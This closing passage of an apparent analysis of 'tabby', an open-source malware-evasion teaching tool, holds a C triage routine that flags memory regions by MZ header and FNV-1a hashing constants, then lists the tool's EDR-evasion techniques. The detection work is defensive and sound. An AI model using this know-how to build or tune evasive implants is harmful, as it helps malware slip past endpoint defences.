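    int has_fnv_basis;  /* 0x811c9dc5 present as bytes c5 9d 1c 81  */
    int has_fnv_prime;  /* 0x01000193 present as bytes 93 01 00 01  */
} triage_result;

/* Naive scan for a 32-bit value stored little-endian anywhere in buf. */
static int contains_le32(const uint8_t *buf, size_t len, uint32_t v) {
    const uint8_t pat[4] = { (uint8_t)v, (uint8_t)(v >> 8),
                             (uint8_t)(v >> 16), (uint8_t)(v >> 24) };
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(buf + i, pat, 4) == 0)
            return 1;
    return 0;
}

static triage_result triage(const uint8_t *buf, size_t len) {
    assert(buf != NULL || len == 0);
    triage_result r;
    r.has_mz        = len >= 2 && buf[0] == 'M' && buf[1] == 'Z';
    r.has_fnv_basis = contains_le32(buf, len, 0x811c9dc5u);
    r.has_fnv_prime = contains_le32(buf, len, 0x01000193u);
    return r;
}
```

An executable private region with has_mz == 0 and both FNV-1a flags set matches the profile described above for a tabby-style blob.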
Conclusion
tabby is interesting because it is small. Every line of code has a reason in the README, the entire build runs on Linux, and the four canonical evasion techniques — position-independent code, IAT-less API resolution, indirect NT syscalls past EDR hooks, and runtime SSN extraction — are laid out in roughly 500 lines of C and 80 of NASM. It is a teaching artifact, not a weapon, and the author calls that out explicitly. For defenders, it is a clean reference of exactly what they should expect to see in modern malware that does its job well, and exactly which detection patterns survive when the obvious ones (inline-hook detection, ntdll call-stack heuristics) don’t. The full source is on GitHub at cocomelonc/tabby.
Original text: cocomelonc/tabby on GitHub by cocomelonc. This tool is a proof of concept for educational purposes only; the original author takes no responsibility for any damage caused by misuse.

